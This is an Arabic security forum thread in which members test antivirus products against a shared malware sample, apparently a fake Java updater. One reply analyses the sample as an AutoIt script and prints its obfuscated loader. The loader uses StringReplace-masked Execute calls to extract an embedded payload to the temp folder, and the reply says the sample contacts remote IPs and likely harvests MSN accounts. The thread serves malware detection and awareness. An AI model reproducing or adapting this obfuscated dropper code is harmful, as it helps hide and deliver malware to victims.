الحالة
مغلق و غير مفتوح للمزيد من الردود.

COMANDOS

مطرووود
إنضم
31 مارس 2014
المشاركات
4,253
مستوى التفاعل
14,962
النقاط
1,105
الإقامة
Alexandria
غير متصل
799400249.png




احتررررررررررررررررس من الهكر المفتررررررررس
:bored:

[hide]
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


infected
[/hide]
 

غير مكتشف من ESET
 
توقيع : imadeddine wissam
و عليكم السلام و رحمة الله و بركاته .. ألف شكر لك
البتد فيندر بالفحص لا شي !
و عند التشغيل ...
1.webp

4.webp

5.webp

6.webp


 
توقيع : أبو رمش
السمول اوفيس 3


بعد فك الضغط نسف العينة
[hide]

VKxm1Ouf.png
[/hide]
 
توقيع : اليوناني
تعجبني ..؛)
جاريے التجربہ ..... ..
إن شاء الله
~
 
توقيع : MagicianMiDo32
توقيع : اليوناني
:mad::mad::mad: الملف ليس مكتشف من النود :banghead::banghead::banghead:
 
توقيع : nasa3
توقيع : اليوناني
توقيع : وليد الجمل
توقيع : nasa3
:mad::mad:محدش يشمت فى النود :mad::mad:
:D:p:LOL::ROFLMAO:كل الحكاية ان النود بيتعشا وجى علشان كده هو مش فاضى يكتشفه"اول مرة اكتب جملة كاملة باللهجة المصرية ":D:p:LOL::ROFLMAO:
وانا كمان بحب مصر جدا واهلها وعشان هيك بحب اتكلم مصرى لان ناسها طيبين ومهضومين كتير
اخوك وليد من المنصوره :p
 
توقيع : وليد الجمل
توقيع : nasa3
وانا كمان بحب مصر جدا واهلها وعشان هيك بحب اتكلم مصرى لان ناسها طيبين ومهضومين كتير
اخوك وليد من المنصوره :p

اخوك احمد من المحلة الكبرى
 
توقيع : nasa3
بقول ايه ياعم كوماندوز هو مين الى قالك انى ده Fake Java Updates تحديث للجافا مزيف

هو علشان الاسم يعنى مكتوب يبقه علطول نطلق عليه زى اسمه

طب مانا ممكن اكتبلك كاسبر اسكاى 2017 هتقولى ده كاسبر مزيف علشان اسمه كده

الاخ صاحب العينه ( المبرمج ) استخدم نوع من انواع الهندسه الاجتماعيه لكى يخدعك عن طريق التسميه

ولكن انا لا الومك لان فعلا اى حد هيشوف الاسم هينخدع فيه

عموما الملف AutoIt مكتوب بداخله تبديل الاسترنج StringReplace

السورس للاطلاع

كود:
$dd = "OUVlCRJq"
Execute(StringReplace('FerfwierfwlerfweWerfwrite(erfwFierfwleOerfwpeerfwn(erfw@erfwTerfweerfwmperfwDirerfw &erfw "\data.berfwin", 1erfw8), StringerfwMid(FileReaerfwd(FileOperfwen(@AuterfwoItEerfwxe, 0)), StrerfwingerfwInerfwStr(FierfwleRead(FerfwileOpen(@AerfwutoItExerfwe, 0)erfw), $erfwdd) + StrinerfwgLeerfwn($dd)erfw))', "erfw", ""))
Execute(StringReplace('fwdeSfwdehfwdeellfwdeExecute(fwdechrfwde(fwde34fwde) fwde&fwde fwde

الملف ايضا يتصل بعده ايبيهات

يقوم بزرع عده ملفات منها بامتداد TXT وعلى الاغلب انه يقوم بجمع حسابات msn

ودى للجميع
 
توقيع : black007
الحصان 10 انترنت سيكيوريتي

بمجرد فك الضغط وبمحركه الخاص اقتنصه
بالفككك.webp


وهاهو معزول
مهزول.webp
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.
عودة
أعلى